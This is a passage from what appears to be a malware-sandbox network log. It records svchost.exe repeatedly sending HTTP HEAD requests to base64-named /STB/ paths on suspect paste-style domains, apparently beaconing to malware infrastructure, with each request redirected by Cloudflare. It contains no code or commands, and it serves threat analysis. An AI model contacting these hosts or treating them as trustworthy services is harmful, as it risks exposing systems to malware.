                                                              Expires: Sun, 12 Jan 2025 09:26:54 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RXRVO8bA0kc6uiHuGpaJkH%2F2gJmQQ55OqjiLTKraM43C%2FeUiRxpUG8yFQpjwJ13yOkQX4sD9BxDyPDOVFQ5DkGYDHwoUEaF7VDERVRmpIOcSOsPGydmvIruEX%2Bv6v8HKdAEa"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3a9cb640fa5-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1470&rtt_var=735&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.750018188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:54.243134022 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:54.716919899 CET872INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:54 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:54 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7TSWNTzPTiUd8cM3vv%2BbCfDoHJQ%2FDFyM3BXDjBGdz2oSlFAUVlMj56LOdAlhFmHlRvnZpCSVmIoK6wb1Bgaqp4Np2B61%2F6mTGiSgCgpPOahmDTKCWVWarmZ2hRViuIpX4s%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3ab8ce88c95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1844&rtt_var=922&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.750021104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:54.427807093 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:54.910401106 CET881INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:54 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:54 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IyyCUDD3kZWggbgG%2Baen2DyoDaz2BWIRUyn5wzPlu%2B%2FTQWPyxOuFiI0kVsMi3P8KLKT2r6btIOc74rEbyhzREyHqRiPJwPyu2fKreGExe%2F5%2FXWtaZk9X8Iw%2BQ51LH4WFCKaj"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3acef0e7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1946&rtt_var=973&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.750023172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:54.734214067 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:55.195628881 CET859INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:55 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:55 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1T8mNlPQ5JAHfdWOEXTnMIsqos2hGCP%2FqkiwSwkhnQeXqEMoG2ZOeBzsy81c7EmTMZjersfADiz90G9h2itik6fpvNhRkeR4ekcbw6pTry4y0s4dmqsIP1YflGThsf%2BX"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3ae9b8d42e3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2602&min_rtt=2602&rtt_var=1301&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.750032172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:55.225296021 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:55.687144041 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:55 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:55 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B7M5%2FovZM2fe3wAfE0lCwMAQ0xF3%2BOdY%2FMgnMqqUnqre2l2HR4zjA%2FEtKypFqRjNRqO2vwhd%2FjXLcPp63xWBXxCzO4SzfP6SOoCk5m3PpQe0rXm0B87QqximPMypi5n2Wq0d"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b1bade4406-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1565&rtt_var=782&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.750034188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:55.563457966 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:56.016355038 CET874INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:55 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:55 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISaihxj87m9EHy5BNH%2BStLP%2Bd8t0Tf6dSzAMxYitmtFaks%2Bt8JbxY1petxjSPJRpfsgYJxOqSFJf8Sx36c7f6L8PJ8ovIk9KoeTfC3arnQJ6Q%2FWODmJIJSn7FP4MLp3Pmmg%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b3ce85c440-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1458&min_rtt=1458&rtt_var=729&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.750036104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:55.746520042 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:56.193901062 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:56 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:56 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rXtW0x9Ofw%2F7xpZOdYe2QvVWDcUGRhGBsx2b3yyDOMyzMw71UJGy4EHkYuXCFNJ2Qi15y%2ByBtdhXxEiGFoW8CgxbNE1U23xH4Blx3cxk355%2Bm3Jl%2ByLUpD7XDdaSCe4VZP4o"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b4e9b442e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.750043172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:56.022967100 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:56.491660118 CET861INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:56 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:56 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JW7s%2FaOdHNzUURhCC%2BBYTEgHMueMD2CTRDSqYNaV4liW7ZT1AqJTlXNYcoNTdgcUVUqQ8cIiCC0DX0HGD9aACVeAmchrE3wlgOv4l%2FLEMViFzbrhR5IUdYWE3NgCistH"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b6bf1a726b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=2000&rtt_var=1000&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.750048172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:56.498018980 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:56.966150999 CET879INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:56 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:56 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nfSs%2BvUPrK%2FTmpCh9acB938Qze1%2FVMWkteUeQa31tW9pRWrNd4TcKZ3yizWA6quXisBG4%2BjkbKWcGWmPZgXEfhmXKoqqYStfU%2FHo33MuR3BFlXnTUEj%2Bo5WT%2BUHrVTnQoD5U"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b9b9464315-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1524&rtt_var=762&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.750052188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:56.679006100 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:57.133270979 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:57 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:57 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yB8JJctSwgKgmm5kgki6Dz16dR%2F7%2BcZPPk3DtY7qrE7qJwei7E%2BXOIhcTAeCmu4Xwxa1DN5s168n28UjPkqtaQF5pHWlCscQtYKCumME%2F84%2Fz4iZZFpiQIHIHrnY329lXEI%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3bac89441ec-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2324&min_rtt=2324&rtt_var=1162&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.750057104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:56.972333908 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:57.439148903 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:57 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:57 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpm%2FapxmbUej7bVX0g6nn8fHrUYUpaJv6N0i9K1ufoIpj12M40c3yUvluNMVhftwk0aXY777udcKM3CDslaK3xoFg%2B9C4ri2SLkDK8tIgB4tw6LG4ADgfHhhIsQEP%2BLZqyri"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3bcaf097c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1989&rtt_var=994&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.750059172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:57.139667988 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:57.609009981 CET866INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:57 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:57 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qv%2B0AK6cgna6b6LpUNsBCpt97rfJD%2FrThWZQd73kdtgqSeGc0nWxvkQiew5irJI%2BCji7aR%2BfrSojcHFFSZVd6lGTY2rX7DTp17z%2BOEgl%2FCugd2GWxKGaQeaV4Z4AGFka"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3bdbe837d11-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.750069172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:57.615297079 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:58.068639040 CET873INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:58 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h0hnTIntVDP0l2NRsZoEZfEY8wpnyiGEjPo%2B9BJympXfxz6F5Zvrlaxd3ANdij8JzHTOgX%2FmrJMUyXb%2FXhMcEDud9D8qfZcwlRH7u%2FvnT90KiSmgyvSPMZHFNAV6o7jJCYeq"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c09a03c3f5-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1659&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.750071188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:57.920340061 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:58.381714106 CET868INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:58 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNe%2BxjU56MTnxuQSOLNFnxiWgGlLWLLiw00MBbbxV2JukvnsS75FeNhX02nYHMBq6d1r96lzLElq9STKYjyjgq1rtCmLSDNwg5epMvXYESXBNbz7HfKolmKckpS430YDJis%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c28ac94229-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              48192.168.2.750073104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:58.076105118 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:58.533907890 CET876INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:58 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tC43tUVnvu0MlM3dBosr5Ck5YKmHhWcLMp362kQoW2P%2BHT5A%2F9U5wty435lN7Cpd7Eu2RiTAm4OasvNdCJSEUnyyN5avqrvPbzrkLix%2BqiyPAzDYd47h5k2IlIZ61REmsw2r"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c38aee7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2009&rtt_var=1004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              49192.168.2.750080172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:58.405452013 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:58.857256889 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:58 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aJjrAcQZCVbjlaYWUHjCyz62WKxp6Nii8YuBXi%2B79y2W%2BvR26ujjnpcdeZjcQDR3uPfV67xUE0at5L1Xss7TegfJDKjPLhtzJbhYdUlkYPSKGMdSk%2FZx%2FBu80POgRPv5"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c5898142b9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              50192.168.2.750085172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:58.970473051 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:59.420799017 CET873INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:59 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLc4OQ80F1aYV01U8TNSa43wwBwfojeYNQbhSmVXVXrachEiPux2X%2BdOQPGL4TR1Vk5gE%2FBYZsddGTDscF0QjnIVkawUbblqNWMoIvkEpFz%2BheHoSuflnHrjiubf364GXr%2BF"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c90baa0f46-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1470&rtt_var=735&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              51192.168.2.750087188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:59.173010111 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:59.693499088 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:59 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BILufdCondTbCmU%2Bv%2BWI4N%2BPDC09lnQovWxA2ofywYX3WqUtWRZGyPNRc1h25zKrPPJYP1hLxsinlsukBeKcB3X4zYpAIaM0WuVcS60msTWcma1ebXw5XAmB3R6Q5BYFxLU%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3cabb49c466-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=11314&min_rtt=11314&rtt_var=5657&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              52192.168.2.750094104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:26:59.431917906 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:59.960928917 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:59 GMT
